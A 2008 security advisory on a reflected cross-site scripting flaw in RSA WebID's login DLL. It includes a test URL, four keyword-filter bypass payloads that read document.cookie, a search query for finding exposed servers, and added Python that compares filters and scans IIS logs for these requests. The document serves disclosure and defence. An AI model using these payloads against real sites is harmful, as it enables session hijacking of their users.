Security Advisory on RSA Web ID (XSS)

Source: securityvulns, SECURITYVULNS:DOC:19428 (archived at vulners.com)
Published: Mar 17, 2008
The following security report was sent to RSA/EMC on 2/10/2007 and confirmed by them. RSA took action to alert
their customers.


Description
The WebID authentication framework suffers from a flaw that allows an attacker to steal an authenticated user's
session if the user is enticed into clicking a malicious link. The flaw is a reflected cross-site scripting (XSS)
bug in the login entry point, so the script runs in the WebID origin and can read its cookies.

TEST URL :
https://www.yournamehere.com/WebID/IISWebAgentIF.dll?stage=useridandpasscode&referrer=Z2F&sessionid=0&authntype=2&username=a&passcode=a&postdata=aaa"%20><SCRIPT>alert(document.cookie)</script><!--

Analysis
The problem resides in the main library IISWebAgentIF.dll, which can usually be found at the address
"http://www.server.com/WebID/IISWebAgentIF.dll". This entry point accepts many parameters, but only the "postdata"
parameter has been found vulnerable.
This parameter is normally sent in a POST request, but it is equally accepted through a GET, which is what makes the
attack deliverable as a plain link.

This bug was already reported and confirmed in April 2005 as CVE-2005-118, and a security fix was issued.
Nevertheless, the fix is poorly implemented: basic circumvention techniques bypass its security checks.

The parameter is matched against the string ""><SCRIPT". It also seems to be matched against the string "javascript:"
and probably other keywords. If any of these keywords is matched, the whole value is discarded from the input.
The problem is that an exhaustive list of dangerous keywords is very hard to build, because of the many ways modern
scripting and markup (HTML, CSS, VBScript, JavaScript, etc.) can express the same thing: a keyword blacklist only
rejects the strings its author anticipated, while any single character that terminates the attribute is enough.

The following examples illustrate how to execute code on the page without triggering the security mechanisms (there
could be many more):

[inserting a newline between the tags]
postdata=aaa%22%3E%0A%3CSCRIPT%3Ealert(document.cookie)%3C/script%3E

[inserting a space between the quotation mark and the closing bracket]
postdata=aaa%22%20%3E%3CSCRIPT%3Ealert(document.cookie)%3C/script%3E

[using the DIV tag to avoid using the keyword "javascript:" (IE only)]
postdata=aaa%22%3E<DIV%20STYLE="width:expression(alert(document.cookie));">

[using VBScript instead of JavaScript (IE only)]
postdata=aaa%22%3E<iframe%20SRC='VBScript:msgbox("XSS")'%20style="visibility:hidden
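To make the bypass concrete, the following is an added Python model (not code from the advisory, and not RSA's code) of a keyword blacklist of the kind described above, beside a character-encoding sanitizer. The two blacklist strings are the ones the advisory names (the real checks in IISWebAgentIF.dll are not public, so this is an assumption), the hidden-field layout the value is reflected into is likewise assumed, and the payloads are the four listed above, URL-decoded, plus the naive form that the blacklist does catch.

```python
import html
import re
from urllib.parse import unquote

# Model of the keyword blacklist described in the advisory. Assumption: only
# the two strings the advisory names are reproduced; matching is case-insensitive.
BLACKLIST = ('"><script', 'javascript:')


def blacklist_filter(postdata: str) -> str:
    """Vendor-style check: if any keyword is present the whole value is
    dropped; otherwise it is reflected untouched."""
    lowered = postdata.lower()
    if any(keyword in lowered for keyword in BLACKLIST):
        return ""
    return postdata


def encode_filter(postdata: str) -> str:
    """Character-based defence: HTML-encode <, >, &, " and ' so the value can
    never terminate the attribute or open a tag, whatever keywords it holds."""
    return html.escape(postdata, quote=True)


def render_hidden_field(postdata: str, sanitizer) -> str:
    """Reflect postdata into a hidden form field (assumed layout of the
    login page that round-trips the value)."""
    return '<input type="hidden" name="postdata" value="%s">' % sanitizer(postdata)


# Exactly one tag (the <input>) is expected in the rendered fragment; any
# further tag start means the value escaped the attribute.
TAG_START = re.compile(r"<\s*/?[A-Za-z]")


def breaks_out(markup: str) -> bool:
    return len(TAG_START.findall(markup)) > 1


# Payloads from the advisory, decoded the way the web agent decodes the query
# string, plus the naive form that the keyword check is designed to stop.
PAYLOADS = {
    "naive": 'aaa"><SCRIPT>alert(document.cookie)</script>',
    "newline": unquote("aaa%22%3E%0A%3CSCRIPT%3Ealert(document.cookie)%3C/script%3E"),
    "space": unquote("aaa%22%20%3E%3CSCRIPT%3Ealert(document.cookie)%3C/script%3E"),
    "div": unquote('aaa%22%3E<DIV%20STYLE="width:expression(alert(document.cookie));">'),
    "vbscript": unquote("aaa%22%3E<iframe%20SRC='VBScript:msgbox(\"XSS\")'%20style=\"visibility:hidden"),
}


def evaluate(sanitizer) -> dict:
    """Map each payload name to True when it still breaks out of the attribute
    after passing through the given sanitizer."""
    return {name: breaks_out(render_hidden_field(p, sanitizer))
            for name, p in PAYLOADS.items()}


if __name__ == "__main__":
    for label, fn in (("keyword blacklist", blacklist_filter), ("HTML encoding", encode_filter)):
        print(label)
        for name, escaped in evaluate(fn).items():
            print("  %-9s %s" % (name, "BYPASS" if escaped else "blocked"))
```

Run stand-alone, the blacklist blocks only the naive payload and lets all four variants through, while the encoding sanitizer neutralises every one of them without needing to know what a script tag, a CSS expression or a VBScript URL looks like.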

Context
Exploitation of the vulnerability requires an action from the victim (clicking on a malicious link).
As the bug is reachable before the authentication phase, it can be discovered and exploited without any access to the
underlying application. As the URL reveals the presence of the product, many vulnerable targets can be found easily
(for example by searching Google for "inurl:IISWebAgentIF.dll"). Finally, an HTML comment opener (<!--) can be appended
to the malicious code so that the rest of the victim's page appears unchanged.
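As an added example for defenders (not part of the original advisory), the following Python scans IIS W3C log lines for requests that hand postdata to IISWebAgentIF.dll in a GET query string, or whose postdata carries attribute-breaking characters or the script vectors named above. The log excerpt is constructed for the example, the field order is the one declared in its #Fields header, and the IPs are documentation ranges.

```python
import re
from urllib.parse import parse_qs

# Constructed IIS W3C log excerpt (not from a real server). Field order follows
# the #Fields header, as IIS writes it.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query c-ip sc-status
2008-03-17 10:01:02 10.0.0.5 POST /WebID/IISWebAgentIF.dll stage=useridandpasscode 192.0.2.10 200
2008-03-17 10:01:09 10.0.0.5 GET /WebID/IISWebAgentIF.dll stage=useridandpasscode&referrer=Z2F&sessionid=0&authntype=2&username=a&passcode=a&postdata=aaa%22%3E%0A%3CSCRIPT%3Ealert(document.cookie)%3C/script%3E 198.51.100.7 200
2008-03-17 10:02:30 10.0.0.5 GET /WebID/IISWebAgentIF.dll stage=useridandpasscode&postdata=aaa%22%3E%3CDIV%20STYLE=%22width:expression(alert(1))%3B%22%3E 198.51.100.7 200
2008-03-17 10:03:00 10.0.0.5 GET /WebID/IISWebAgentIF.dll stage=useridandpasscode&postdata=ZmFjdG9y 192.0.2.11 200
2008-03-17 10:04:00 10.0.0.5 GET /index.html - 192.0.2.12 200
"""

# Characters that end an attribute or open a tag, plus the script vectors the
# advisory's bypasses rely on (CSS expression(), javascript:/vbscript: URLs).
MARKUP = re.compile(r"""[<>"']|expression\s*\(|(?:java|vb)script:""", re.IGNORECASE)


def parse_w3c(text):
    """Yield one dict per record, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split(" ")))


def find_suspicious(log_text):
    """Return (timestamp, client ip, reasons) for requests that hand postdata
    to IISWebAgentIF.dll in a GET, or with markup metacharacters in it."""
    findings = []
    for rec in parse_w3c(log_text):
        if not rec["cs-uri-stem"].lower().endswith("/iiswebagentif.dll"):
            continue
        query = rec["cs-uri-query"]
        if query == "-":  # IIS logs "-" for an empty query string
            continue
        for value in parse_qs(query, keep_blank_values=True).get("postdata", []):
            reasons = []
            if rec["cs-method"].upper() == "GET":
                reasons.append("postdata passed in a GET query string")
            if MARKUP.search(value):
                reasons.append("markup/script metacharacters in postdata")
            if reasons:
                findings.append((rec["date"] + " " + rec["time"], rec["c-ip"], reasons))
    return findings


if __name__ == "__main__":
    for when, client, reasons in find_suspicious(SAMPLE_LOG):
        print(when, client, "; ".join(reasons))
```

One caveat to keep in mind: IIS does not log request bodies, so the POST form of the request is invisible here and only the GET variant (the one a malicious link produces) can be caught from the logs. Because the advisory states that postdata is normally sent by POST, any GET carrying it is flagged even when the value looks benign, which is why the third constructed line is reported on that ground alone.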

Affected Software
We have confirmed the existence of this vulnerability in RSA WebID 5.3 + Security Fix XSS ID 45559. It is suspected that
any earlier version is also vulnerable.

Recommendation
It is safer to filter dangerous characters than dangerous keywords: HTML-encode every reflected value for the context it
is inserted into (at minimum <, >, ", ' and &) instead of searching it for a list of known-bad strings, since a
blacklist can only reject what its author anticipated.